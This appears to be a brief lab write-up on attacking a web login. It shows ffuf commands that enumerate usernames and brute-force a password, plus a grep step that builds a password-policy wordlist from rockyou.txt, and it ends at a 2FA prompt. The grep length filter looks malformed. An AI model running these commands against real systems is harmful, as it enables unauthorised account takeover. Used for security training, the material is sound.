First i create an account:
Then i connect to admin panel:
I created 2 accounts, felix and felix1 to look at some differences:
and i saw the following:
cookie of felix: PHPSESSID=oskfiuf01785f4f9ba735e0c3p
---------- felix1: PHPSESSID=oskfiuf01785f4f9ba735e0c3p
Ok after a bit of messing arounf i find the path
ffuf -w /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -u http://94.237.63.227:35458/login.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=FUZZ&password=test" -fr "Unknown username"
So we found user gladys
now let's create a custom wordlist according to password policy:
grep '[[:upper:]]' rockyou.txt | grep '[[:lower:]]' | grep '[[:digit:]]' | grep -E '{12}' > custom_wordlist.txt
Now we bruteforce:
ffuf -w custom_wordlist.txt -u http://94.237.63.227:35458/login.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=gladys&password=FUZZ" -fr "Unknown username"
Now with the creds, let's connect, we can see 2FA: